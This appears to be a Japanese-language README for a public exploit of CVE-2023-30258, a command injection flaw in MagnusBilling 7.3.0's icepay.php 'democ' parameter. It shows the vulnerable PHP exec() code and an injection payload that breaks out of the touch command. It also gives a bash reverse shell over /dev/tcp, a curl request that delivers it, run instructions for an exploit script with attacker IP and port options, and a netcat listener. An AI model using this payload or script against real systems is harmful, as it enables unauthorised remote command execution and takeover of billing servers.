
CVE-2023-30258のエクスプロイト:MagnusBilling 7.3.0のicepay.phpのサニタイズされていない'democ'パラメータを介したリモートコード実行で、コマンドインジェクションとリバースシェルを可能にします。
magnus billing 7.3.0には、icepay.phpリソースのパラメータ"democ"にリモートコード実行の脆弱性があります。この脆弱性により、クエリをエスケープして任意のコマンドを実行できます。
if (isset($_GET['democ'])) {
if (strlen($_GET['democ']) > 5) {
exec("touch " . $_GET['democ'] . '.txt');
} else {
exec("rm -rf *.txt");
}
}
「democ」パラメータはexec()に渡され、新しいファイルを作成します。しかし、ご覧の通り、文字列のサニタイズが行われていないため、攻撃者はtouchコマンドを簡単にエスケープして、コマンドを実行したり、リバースシェルを取得したりすることができます。txt拡張子を回避するには、文字列の末尾に「;」を追加するだけです。最終的なペイロードは次のようになります:
testfile;<command>;testfile
そして、exec()関数に渡されたときの状態は次のようになります:
exec('touch testfile;<command>;testfile.txt');
例:リバースシェル:
exec('touch testfile; bash -c "bash -i >& /dev/tcp/<ip>/<port> 0>&1";testfile.txt')
curlを使用してリバースシェルを取得できます。例:
curl -X GET http://127.0.0.1:8080/lib/icepay/icepay.php?democ=testfile;<urlencoded_payload>;testfile
または、このリポジトリのPythonスクリプトを使用することもできます。インストール:
git clone https://github.com/kayl22/magnus_billing_7.3.0_RCE_CVE-2023-30258 # get the repository
cd ./magnus_billing_7.3.0_RCE_CVE-2023-30258 # change directory
chmod +x ./magnusbilling_rce.py # add execution permissions to the python script
使用方法:
./magnusbilling_rce.py -h # show help
./magnusbilling_rce.py -lh <attacker_ip> -lp <local_port> -u http://<ip/domain>:<port>/
そして最後に、netcatでリスナーを起動するのを忘れないでください:
nc -nlvvp <local_port>